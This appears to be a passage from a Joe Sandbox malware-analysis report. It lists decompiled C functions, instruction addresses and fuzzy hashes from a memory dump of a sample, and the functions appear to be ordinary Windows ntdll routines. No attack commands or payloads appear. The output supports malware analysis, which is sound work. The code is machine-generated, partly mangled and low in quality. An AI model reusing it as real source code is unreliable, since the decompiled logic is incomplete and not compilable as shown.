									if( *((intOrPtr*)(_t202 + 0x94)) != 0) {
										E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t176);
									}
									_t180 = L328A5D90(_t214,  *((intOrPtr*)( *[fs:0x30] + 0x18)), "true", _v20 + 0x10);
									 *((intOrPtr*)(_t202 + 0x94)) = _t180;
									if(_t180 != 0) {
										 *((intOrPtr*)(_t180 + 8)) = _v20;
										 *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x94)) + 0xc)) = _v16;
										_t220 =  *((intOrPtr*)(_t202 + 0x94));
										 *_t220 = _t220 + 0x10;
										 *((intOrPtr*)(_t220 + 4)) = 0;
										E328D88C0( *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x94)))), _v28, _v20);
										_t247 = _t247 + 0xc;
									}
									 *((intOrPtr*)(_t202 + 0x20)) = 0;
									E328A24D0(_t236);
									_t210 = _v76;
									_t161 = _v80;
									_t200 = _v84;
									_t234 = _v88;
									L10:
									_t227 =  *((intOrPtr*)(_t238 + 0x1c));
									_v44 = _t227;
									if(_t227 != 0) {
										 *0x329891e0(_v48 + 0x38, _v52, _v63, _t161, _t210, _t234, _t200, _v36,  *((intOrPtr*)(_t238 + 0x20)));
										_v44();
									}
									_pop(_t235);
									_pop(_t243);
									_pop(_t201);
									return E328D4B50(0, _t201, _v8 ^ _t247, _t227, _t235, _t243);
								}
								_t172 = _v88;
								L31:
								_t214 = _t214 + 1;
								_t172 = _t172 + 0x18;
								_v92 = _t214;
								_v88 = _t172;
							} while (_t214 < 4);
							goto L34;
						}
					}
					L9:
					_t161 = _v104;
					_t210 = _v100;
					goto L10;
				}
				_t234 = _t233 | 0xffffffff;
				_t200 = _t234;
				_v84 = _t234;
				_v80 = _t200;
				if( *((intOrPtr*)(_t238 + 0x4c)) == _t151) {
					_t222 = _v72;
					_v105 = _v64;
					_t195 = _v76;
				} else {
					_t197 =  *((intOrPtr*)(_t238 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t197) {
						_v63 = _t197;
					}
					_t195 = _v76 |  *(_t238 + 0x40);
					_t222 = _v72 |  *(_t238 + 0x44);
					_t234 =  *(_t238 + 0x38);
					_t200 =  *(_t238 + 0x3c);
					_v76 = _t195;
					_v72 = _t222;
					_v84 = _t234;
					_v80 = _t200;
				}
				_v104 = _t195;
				_v100 = _t222;
				if( *((char*)(_t238 + 0xc4)) != 0) {
					_t226 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t238 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t238 + 0xc5));
						_t226 = _v48;
					}
					_t196 = _t195 |  *(_t238 + 0xb8);
					_t223 = _t222 |  *(_t238 + 0xbc);
					_t234 = _t234 &  *(_t238 + 0xb0);
					_t200 = _t200 &  *(_t238 + 0xb4);
					_v104 = _t196;
					_v76 = _t196;
					_v100 = _t223;
					_v72 = _t223;
					_v84 = _t234;
					_v80 = _t200;
				}
				_t155 = 0;
				if(_v105 == 0) {
					_v52 = 0;
					_t234 = 0;
					_t200 = 0;
					 *((intOrPtr*)(_t226 + 0x74)) = 0;
					goto L19;
				} else {
					_v52 = 1;
					goto L8;
				}
			}

0x32891059
0x32891063
0x32891069
0x3289106d
0x3289106f
0x32891076
0x3289107a
0x3289107e
0x32891088
0x32891093
0x32891097
0x3289109b
0x3289109b
0x3289109b
0x3289109d
0x328ef1b9
0x328ef1bc
0x328ef1bf
0x328ef1c3
0x328ef1c6
0x328ef1ca
0x328ef1ce
0x328ef1d1
0x328ef1d5
0x328ef1d9
0x328ef255
0x328ef255
0x328ef259
0x32891118
0x3289111c
0x328ef262
0x328ef268
0x328ef26c
0x328ef26c
0x328ef270
0x00000000
0x00000000
0x328ef27e
0x328ef27f
0x328ef282
0x328ef289
0x00000000
0x00000000
0x00000000
0x328ef28b
0x328ef295
0x328ef29b
0x328ef29f
0x328ef2a3
0x328ef2a7
0x328ef2ab
0x328ef2b5
0x328ef2c0
0x328ef2c4
0x328ef2ca
0x328ef2d4
0x328ef2d8
0x328ef2dc
0x00000000
0x328ef2ed
0x328ef2ef
0x328ef2f2
0x328ef2f5
0x328ef2fc
0x328ef301
0x328ef303
0x328ef306
0x328ef30a
0x328ef30e
0x328ef312
0x00000000
0x00000000
0x328ef323
0x328ef327
0x328ef348
0x328ef34d
0x328ef351
0x328ef354
0x328ef357
0x328ef35c
0x00000000
0x00000000
0x328ef362
0x328ef366
0x328ef36a
0x328ef378
0x328ef37b
0x328ef383
0x328ef392
0x328ef392
0x328ef3aa
0x328ef3af
0x328ef3b7
0x328ef3bd
0x328ef3ca
0x328ef3cd
0x328ef3d6
0x328ef3da
0x328ef3ed
0x328ef3f2
0x328ef3f2
0x328ef3f8
0x328ef3fb
0x328ef400
0x328ef404
0x328ef408
0x328ef40c
0x3289112a
0x3289112a
0x3289112d
0x32891133
0x32891153
0x32891159
0x32891159
0x32891163
0x32891164
0x32891165
0x32891170
0x32891170
0x328ef329
0x328ef32d
0x328ef32d
0x328ef32e
0x328ef331
0x328ef335
0x328ef339
0x00000000
0x328ef33e
0x328ef2dc
0x32891122
0x32891122
0x32891126
0x00000000
0x32891126
0x328910a3
0x328910a6
0x328910a8
0x328910ac
0x328910b3
0x328ef1e1
0x328ef1e5
0x328ef1e9
0x328910b9
0x328910b9
0x328910bc
0x328910c5
0x328910c7
0x328910c7
0x328910d3
0x328910d6
0x328910d9
0x328910dc
0x328910df
0x328910e3
0x328910e7
0x328910eb
0x328910eb
0x328910f6
0x328910fa
0x328910fe
0x328ef1fc
0x328ef200
0x328ef205
0x328ef20d
0x328ef211
0x328ef211
0x328ef215
0x328ef21b
0x328ef221
0x328ef227
0x328ef22d
0x328ef231
0x328ef235
0x328ef239
0x328ef23d
0x328ef241
0x328ef241
0x32891104
0x3289110a
0x328ef24a
0x328ef24e
0x328ef250
0x328ef252
0x00000000
0x32891110
0x32891110
0x00000000
0x32891110

APIs

RtlDebugPrintTimes.NTDLL ref: 32891153

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: c01a6fdbc86f261afb59181dd01a47b62e434b38cd9735e653ff74d0fe320aba
Instruction ID: 25619aa28a129c81ba7abffa8e16bf82b99a4519b6fac61156cfd32308a89860
Opcode Fuzzy Hash: c01a6fdbc86f261afb59181dd01a47b62e434b38cd9735e653ff74d0fe320aba
Instruction Fuzzy Hash: D9B111B96093809FD354CF28C480A5AFBF1BF89744F18496EE89A87352D771E845CB82

Uniqueness

Uniqueness Score: -1.00%

Function 32894779 Relevance: 1.6, APIs: 1, Instructions: 111
timeCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E32894779(signed int __eax, signed int __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v0;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t55;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t67;
				signed int _t69;
				void* _t73;
				intOrPtr _t74;
				signed int _t76;
				signed int _t79;
				void* _t80;
				intOrPtr* _t84;
				signed int _t88;
				intOrPtr* _t93;
				intOrPtr _t96;
				signed int _t98;
				intOrPtr* _t100;
				void* _t102;

				_t88 = __edx;
				_t55 = __eax;
				_push(_t73);
				_t100 = __edx;
				if((_a4 & 0x00000001) == 0) {
					L17:
					if((_a4 & 0x00000002) != 0) {
						_push("true");
						_t93 = _t100 + 8;
						_pop(_t74);
						do {
							__eflags =  *_t93;
							if( *_t93 != 0) {
								E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *_t93);
							}
							_t93 = _t93 + 4;
							_t74 = _t74 - 1;
							__eflags = _t74;
						} while (_t74 != 0);
						_t55 = E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t74, _t100);
					}
					return _t55;
				} else {
					_t79 =  *0x329866fc; // 0x5
					_v12 = _t79;
					if(_t79 >= 1) {
						_t98 = 0x11;
						do {
							asm("bsr eax, edi");
							_t88 = _t98;
							asm("btc edx, eax");
							_v20 = _t88;
							_t55 =  *(_t100 + _t55 * 4 - 8);
							_v16 = _t55;
							if(_t55 != 0) {
								_t55 = _t55 + _t88 * 4 + 4;
								if(_t55 != 0 &&  *_t55 != 0) {
									asm("bsr eax, edi");
									_t85 = _t98;
									asm("btc ecx, eax");
									_t67 =  *((intOrPtr*)(0x329866c4 + _t55 * 4));
									if(_t67 == 0) {
										_t73 = 0;
									} else {
										_t73 = 4 + _t85 * 8 + _t67;
									}
									L328953C0(_t73);
									_t69 =  *((intOrPtr*)(_t73 + 4));
									_v12 = _t69;
									if(_t69 != 0 && _t69 != 0xffffffff) {
										_t88 = _v16;
										_t85 =  *(_t88 + 4 + _v20 * 4);
										if(_t85 != 0) {
											 *0x329891e0(_t85);
											_v8();
											_t72 = _v24;
											 *(_v20 + 4 + _t72 * 4) =  *(_v20 + 4 + _v24 * 4) & 0x00000000;
										}
									}
									_t55 = E328952F0(_t85, _t73);
									_t79 = _v16;
								}
							}
							_t98 = _t98 + 1;
							_t79 = _t79 - 1;
							_v12 = _t79;
						} while (_t79 != 0);
					}
					L328A2330(_t55, 0x329866d0);
					_t60 =  *_t100;
					if( *((intOrPtr*)(_t60 + 4)) != _t100) {
						L24:
						_t80 = 3;
						asm("int 0x29");
						_push(_t80);
						_push(_t73);
						_push(_t100);
						_push(0x329866d0);
						_t96 = _v28;
						_t76 = _t88;
						_t102 = _t80;
						__eflags = _t96;
						if(__eflags != 0) {
							_t61 =  *((intOrPtr*)(_t96 + 0x1c));
						} else {
							_t61 = 0;
							__eflags = 0;
						}
						_push(_a12);
						_push(_a8);
						_push(_t61);
						_push(_t96);
						_t62 = E3289496B(_t76, _t80, _t96, _t102, __eflags);
						__eflags = _t62;
						if(_t62 >= 0) {
							E3289491F( *((intOrPtr*)(_t102 + 0x5c)), 1);
							 *(_t102 + 0x90) =  *(_t102 + 0x90) & 0x00000000;
							 *(_t102 + 0xdd) = _t76;
							__eflags = _t96;
							if(_t96 != 0) {
								 *((intOrPtr*)(_t102 + 0x10)) =  *((intOrPtr*)(_t96 + 0x18));
							}
							__eflags =  *((intOrPtr*)(_t102 + 8));
							if(__eflags != 0) {
								E328C73B3(_t76, _t102, _t96, _t102, __eflags);
							}
							_t62 = 0;
							__eflags = 0;
						}
						return _t62;
					} else {
						_t84 =  *((intOrPtr*)(_t100 + 4));
						if( *_t84 != _t100) {
							goto L24;
						} else {
							 *_t84 = _t60;
							 *((intOrPtr*)(_t60 + 4)) = _t84;
							_t55 = E328A24D0(0x329866d0);
							goto L17;
						}
					}
				}
			}

0x32894779
0x32894779
0x32894788
0x3289478b
0x3289478d
0x3289486a
0x3289486e
0x32894879
0x3289487b
0x3289487e
0x3289487f
0x3289487f
0x32894882
0x328948ab
0x328948ab
0x32894884
0x32894887
0x32894887
0x32894887
0x32894897
0x32894897
0x32894876
0x32894793
0x32894793
0x32894799
0x328947a0
0x328947a8
0x328947a9
0x328947a9
0x328947ac
0x328947ae
0x328947b1
0x328947b5
0x328947b9
0x328947bf
0x328947c4
0x328947c7
0x328947ce
0x328947d1
0x328947d3
0x328947d6
0x328947df
0x328f0144
0x328947e5
0x328947ec
0x328947ec
0x328947ef
0x328947f4
0x328947f7
0x328947fd
0x32894808
0x3289480c
0x32894812
0x32894817
0x3289481d
0x32894821
0x32894829
0x32894829
0x32894812
0x3289482f
0x32894834
0x32894834
0x328947c7
0x32894838
0x32894839
0x3289483c
0x3289483c
0x328947a9
0x3289484c
0x32894851
0x32894856
0x328948b2
0x328948b4
0x328948b5
0x328948bc
0x328948bd
0x328948be
0x328948bf
0x328948c0
0x328948c3
0x328948c5
0x328948c7
0x328948c9
0x3289491a
0x328948cb
0x328948cb
0x328948cb
0x328948cb
0x328948cd
0x328948d3
0x328948d6
0x328948d7
0x328948d8
0x328948dd
0x328948df
0x328948e7
0x328948ec
0x328948f3
0x328948f9
0x328948fb
0x32894900
0x32894900
0x32894903
0x32894907
0x3289490b
0x3289490b
0x32894910
0x32894910
0x32894910
0x32894917
0x32894858
0x32894858
0x3289485d
0x00000000
0x3289485f
0x3289485f
0x32894862
0x32894865
0x00000000
0x32894865
0x3289485d
0x32894856

APIs

RtlDebugPrintTimes.NTDLL ref: 32894817

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 690da5cc3b0d2b565fb0e66b516ca9b0f1c84ecac1e2b0ad9080f92b8fdac14a
Instruction ID: 1e8ace921dbeb5d73d08b16014c54d86ceaea2f584618e6b6e6b271f366ad9a9
Opcode Fuzzy Hash: 690da5cc3b0d2b565fb0e66b516ca9b0f1c84ecac1e2b0ad9080f92b8fdac14a
Instruction Fuzzy Hash: 5941137C6043858FE314CF28D894B6ABBEAFF81394F14482DE9599B2A0DF70D855CB91

Uniqueness

Uniqueness Score: -1.00%

Function 3288B420 Relevance: 1.6, APIs: 1, Instructions: 100
timeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E3288B420(signed int __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v0;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _t25;
				intOrPtr* _t27;
				void* _t28;
				signed int _t29;
				intOrPtr _t31;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr* _t46;
				intOrPtr _t47;
				void* _t49;
				intOrPtr _t51;
				intOrPtr _t61;
				intOrPtr* _t62;
				signed int _t69;
				void* _t71;

				_t40 = __ebx;
				_t71 = (_t69 & 0xfffffff8) - 0x14;
				_push(__ebx);
				_t61 = _a8;
				_push(__edi);
				_t57 = _t61 + 0x14;
				L328A2330(_t25, _t61 + 0x14);
				_t27 = _t61 + 0x18;
				_t62 =  *_t27;
				if(_t62 == _t27) {
					_t62 = 0;
					goto L4;
				} else {
					if( *((intOrPtr*)(_t62 + 4)) != _t27) {
						L11:
						_t49 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						if( *0x32985da8 == 0) {
							E3288B566(_t49, _v0, _t57, _t62);
							return E3288B502(_v0);
						}
						return _t27;
					} else {
						_t51 =  *_t62;
						if( *((intOrPtr*)(_t51 + 4)) != _t62) {
							goto L11;
						} else {
							 *_t27 = _t51;
							 *((intOrPtr*)(_t51 + 4)) = _t27;
							L4:
							_t28 = E328A24D0(_t57);
							_t42 = _a8;
							if((_t40 & 0xffffff00 |  *_t27 != _t27) != 0) {
								_t28 = L328A1C8F(_t42, _t42,  *((intOrPtr*)(_a4 + 0x48)), _t57, 1, 0);
							}
							if(_t62 != 0) {
								_t10 = _t62 - 0x10; // -16
								_t29 = _t10;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t46 =  *((intOrPtr*)(_t29 + 0x18));
								asm("lock xadd [ecx+0x4], eax");
								if((_t29 | 0xffffffff) == 0) {
									_t31 =  *0x32986644; // 0x0
									E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t31 + 0x300000,  *_t46);
								}
								_t47 = _a4;
								 *((intOrPtr*)(_t47 + 0x30)) =  *((intOrPtr*)(_t42 + 0x20));
								 *((intOrPtr*)(_t47 + 0x34)) = _t42;
								 *0x329891e0(_t47, _t42,  *((intOrPtr*)(_t71 + 0x18)), _t71 + 0x18);
								_t28 =  *((intOrPtr*)( *((intOrPtr*)(_t42 + 0x20))))();
							}
							return _t28;
						}
					}
				}
			}

0x3288b420
0x3288b428
0x3288b42b
0x3288b42d
0x3288b430
0x3288b431
0x3288b435
0x3288b43a
0x3288b43d
0x3288b441
0x3288b4d0
0x00000000
0x3288b447
0x3288b44a
0x3288b4d4
0x3288b4d6
0x3288b4d7
0x3288b4d9
0x3288b4da
0x3288b4db
0x3288b4dc
0x3288b4dd
0x3288b4de
0x3288b4df
0x3288b4ec
0x3288b4f1
0x00000000
0x3288b4f9
0x3288b4ff
0x3288b450
0x3288b450
0x3288b455
0x00000000
0x3288b457
0x3288b457
0x3288b459
0x3288b45c
0x3288b462
0x3288b469
0x3288b46c
0x3288b4c9
0x3288b4c9
0x3288b470
0x3288b472
0x3288b472
0x3288b47b
0x3288b47c
0x3288b47d
0x3288b47e
0x3288b47f
0x3288b485
0x3288b48a
0x328eccdd
0x328eccf1
0x328eccf1
0x3288b490
0x3288b496
0x3288b4a2
0x3288b4ac
0x3288b4b2
0x3288b4b2
0x3288b4ba
0x3288b4ba
0x3288b455
0x3288b44a

APIs

RtlDebugPrintTimes.NTDLL ref: 3288B4AC

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: de61b4071acb778bf54c4e5dae176c4d6b6104a82d0e50101818982e7cf4ce5a
Instruction ID: 31bf0861375b35e53186d2176f4065e4de53df0fa1cbe628725be43dcecf0e45
Opcode Fuzzy Hash: de61b4071acb778bf54c4e5dae176c4d6b6104a82d0e50101818982e7cf4ce5a
Instruction Fuzzy Hash: B031477A5402089FD711DF1CC881E6A77A9FF85364F148269ED299F2A2CB31ED42CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 328956E0 Relevance: 1.6, APIs: 1, Instructions: 92
timeCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E328956E0(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				void* _v36;
				void* _v60;
				void* _t32;
				char* _t35;
				void* _t37;
				char* _t41;
				char* _t52;
				intOrPtr _t60;
				void* _t70;
				signed int _t76;
				signed int _t77;

				_t77 = _t76 & 0xfffffff8;
				_push(__ecx);
				_t73 = _a8;
				_t70 = _a8 - 0x78;
				_t32 = L328A3C40();
				_t52 = 0x7ffe0386;
				if(_t32 != 0) {
					_t35 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				} else {
					_t35 = 0x7ffe0386;
				}
				if( *_t35 != 0) {
					E32964B67( *((intOrPtr*)(_t70 + 0x5c)), _t73,  *((intOrPtr*)(_t70 + 0x30)),  *((intOrPtr*)(_t70 + 0x34)),  *((intOrPtr*)(_t70 + 0x3c)));
				}
				_t37 = E32897072(_a4, _t70, 0);
				if(_t37 != 0) {
					if(L328A3C40() != 0) {
						_t41 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t41 = _t52;
					}
					if( *_t41 != 0) {
						L32964C59( *((intOrPtr*)(_t70 + 0x5c)), _t73,  *((intOrPtr*)(_t70 + 0x30)),  *((intOrPtr*)(_t70 + 0x34)),  *((intOrPtr*)(_t70 + 0x3c)));
					}
					L32896F4C(_t77 + 0x10,  *((intOrPtr*)(_t70 + 0x30)),  *((intOrPtr*)(_t70 + 0x34)),  *((intOrPtr*)(_t70 + 0x3c)));
					_t60 = _a4;
					 *((intOrPtr*)(_t60 + 0x30)) =  *((intOrPtr*)(_t70 + 0x30));
					 *((intOrPtr*)(_t60 + 0x34)) =  *((intOrPtr*)(_t70 + 0x34));
					 *0x329891e0(_t60,  *((intOrPtr*)(_t70 + 0x34)), _t70);
					 *((intOrPtr*)( *((intOrPtr*)(_t70 + 0x30))))();
					if(L328A3C40() != 0) {
						_t52 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					}
					if( *_t52 != 0) {
						L32964CD2( *((intOrPtr*)(_t70 + 0x5c)), _a8,  *((intOrPtr*)(_t70 + 0x30)),  *((intOrPtr*)(_t70 + 0x34)),  *((intOrPtr*)(_t70 + 0x3c)));
					}
					_t37 = E32896ECF( *((intOrPtr*)(_t77 + 0xc)));
				}
				return _t37;
			}

0x328956e5
0x328956e8
0x328956eb
0x328956ef
0x328956f2
0x328956f7
0x328956fe
0x328f06a1
0x32895704
0x32895704
0x32895704
0x32895709
0x328f06b9
0x328f06b9
0x32895716
0x3289571d
0x32895726
0x328f06cc
0x3289572c
0x3289572c
0x3289572c
0x32895731
0x328f06e4
0x328f06e4
0x32895744
0x32895749
0x32895750
0x32895756
0x32895762
0x32895768
0x32895771
0x328f06f7
0x328f06f7
0x3289577a
0x328f0711
0x328f0711
0x32895784
0x32895784
0x3289578f

APIs

RtlDebugPrintTimes.NTDLL ref: 32895762

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 0d3a8b6c93e3274c7669a3536a1bb55137dd1e3dd664aa9228ffb748c309b79c
Instruction ID: e6f3369be91bc48d5ff220f0bbbf840b9fad69077126f4b16e9235a18a99b863
Opcode Fuzzy Hash: 0d3a8b6c93e3274c7669a3536a1bb55137dd1e3dd664aa9228ffb748c309b79c
Instruction Fuzzy Hash: 0C31CC3D616A05FFE7558B24DE80B99BBA6FF84354F405055EC0087B51CB7AE830CB80

Uniqueness

Uniqueness Score: -1.00%

Function 3293E750 Relevance: 1.6, APIs: 1, Instructions: 91
timeCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E3293E750(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				char _v20;
				intOrPtr _v24;
				char _v25;
				intOrPtr _v28;
				intOrPtr* _v32;
				char _v33;
				char* _t30;
				intOrPtr* _t33;
				void* _t37;
				intOrPtr* _t42;
				intOrPtr* _t43;
				intOrPtr* _t44;
				intOrPtr* _t46;
				char* _t49;
				char _t51;
				char* _t53;
				intOrPtr* _t57;
				intOrPtr* _t60;

				_t30 =  &_v12;
				_v24 = __ecx;
				_t60 = __edx;
				_v8 = _t30;
				_t46 = 0;
				_v16 = __edx;
				_v25 = 0;
				_v12 = _t30;
				L328A2330(_t30, 0x32986d4c);
				_t57 =  *0x3298379c; // 0x778e379c
				if(_t57 == 0x3298379c) {
					L10:
					E328A24D0(0x32986d4c);
					while(1) {
						_t33 = _v12;
						_t49 =  &_v12;
						if(_t33 == _t49) {
							goto L16;
						}
						if( *((intOrPtr*)(_t33 + 4)) != _t49) {
							goto L15;
						} else {
							_t51 =  *_t33;
							if( *((intOrPtr*)(_t51 + 4)) != _t33) {
								goto L15;
							} else {
								_v12 = _t51;
								 *((intOrPtr*)(_t51 + 4)) =  &_v12;
								E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
								continue;
							}
						}
						goto L16;
					}
				} else {
					do {
						_t7 = _t57 + 8; // 0x778e37a4
						_t37 = _t7;
						_t46 = _t57;
						 *_t37 =  *_t37 + 1;
						_v20 = _t37;
						E328A24D0(0x32986d4c);
						 *0x329891e0(_v28, _t60);
						if( *((intOrPtr*)( *((intOrPtr*)(_t57 + 0xc))))() != 0) {
							_v33 = 1;
						}
						L328A2330(_t40, 0x32986d4c);
						_t42 = _v32;
						_t57 =  *_t57;
						 *_t42 =  *_t42 - 1;
						if( *_t42 != 0) {
							goto L8;
						} else {
							if( *((intOrPtr*)(_t57 + 4)) != _t46) {
								L15:
								_push(3);
								asm("int 0x29");
							} else {
								_t43 =  *((intOrPtr*)(_t46 + 4));
								if( *_t43 != _t46) {
									goto L15;
								} else {
									 *_t43 = _t57;
									_t53 =  &_v20;
									 *((intOrPtr*)(_t57 + 4)) = _t43;
									_t44 = _v16;
									if( *_t44 != _t53) {
										goto L15;
									} else {
										 *_t46 = _t53;
										 *((intOrPtr*)(_t46 + 4)) = _t44;
										 *_t44 = _t46;
										_v16 = _t46;
										goto L8;
									}
								}
							}
						}
						goto L16;
						L8:
						_t60 = _v24;
					} while (_t57 != 0x3298379c);
					_t46 = _v33;
					goto L10;
				}
				L16:
				return _t46;
			}

0x3293e75e
0x3293e762
0x3293e766
0x3293e768
0x3293e76c
0x3293e76e
0x3293e777
0x3293e77b
0x3293e77f
0x3293e784
0x3293e790
0x3293e80f
0x3293e814
0x3293e819
0x3293e819
0x3293e81d
0x3293e823
0x00000000
0x00000000
0x3293e828
0x00000000
0x3293e82a
0x3293e82a
0x3293e82f
0x00000000
0x3293e831
0x3293e83c
0x3293e842
0x3293e848
0x00000000
0x3293e848
0x3293e82f
0x00000000
0x3293e828
0x3293e792
0x3293e792
0x3293e792
0x3293e792
0x3293e795
0x3293e797
0x3293e79e
0x3293e7a2
0x3293e7b1
0x3293e7bb
0x3293e7bd
0x3293e7bd
0x3293e7c7
0x3293e7cc
0x3293e7d0
0x3293e7d2
0x3293e7d5
0x00000000
0x3293e7d7
0x3293e7da
0x3293e84f
0x3293e84f
0x3293e852
0x3293e7dc
0x3293e7dc
0x3293e7e1
0x00000000
0x3293e7e3
0x3293e7e3
0x3293e7e5
0x3293e7e9
0x3293e7ec
0x3293e7f2
0x00000000
0x3293e7f4
0x3293e7f4
0x3293e7f6
0x3293e7f9
0x3293e7fb
0x00000000
0x3293e7fb
0x3293e7f2
0x3293e7e1
0x3293e7da
0x00000000
0x3293e7ff
0x3293e7ff
0x3293e803
0x3293e80b
0x00000000
0x3293e80b
0x3293e854
0x3293e85c

APIs

RtlDebugPrintTimes.NTDLL ref: 3293E7B1

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: c91f6d7cc50d1bfca34aefdb2ee6e1f6ff6147f84afabf6e550d01b8d9509f11
Instruction ID: 807c8726f33530ac6579dfbb1bc7ef22172458a5c6c6bbe5f45da59dfb51e6d0
Opcode Fuzzy Hash: c91f6d7cc50d1bfca34aefdb2ee6e1f6ff6147f84afabf6e550d01b8d9509f11
Instruction Fuzzy Hash: B2319CB590A3018FD711DF19C440A5ABBE5FF89354F088AAEE988AB251D730DD06CFD2

Uniqueness

Uniqueness Score: -1.00%

Function 3291A130 Relevance: 1.5, APIs: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E3291A130(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				signed int _t24;
				intOrPtr* _t31;

				_t24 =  *( *[fs:0x30] + 0x68) & 0x02000100;
				if(_t24 != 0x2000000) {
					_t31 =  *0x32985a44; // 0x0
					if(_t31 != 0) {
						 *0x329891e0(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40);
						_t24 =  *_t31();
					}
					return _t24;
				}
				return E3291A1A7(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40);
			}

0x3291a13e
0x3291a148
0x3291a170
0x3291a178
0x3291a19a
0x3291a1a0
0x3291a1a0
0x00000000
0x3291a1a2
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 3291A19A

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: c4ed0060e5d8ad3b2f010055a85938172b61c5318c643493ae28cc5ea1fef1b5
Instruction ID: f5ad946b94cb7daeca9ff1dd1c08d456479fa81e27449872365c492155ab1cdf
Opcode Fuzzy Hash: c4ed0060e5d8ad3b2f010055a85938172b61c5318c643493ae28cc5ea1fef1b5
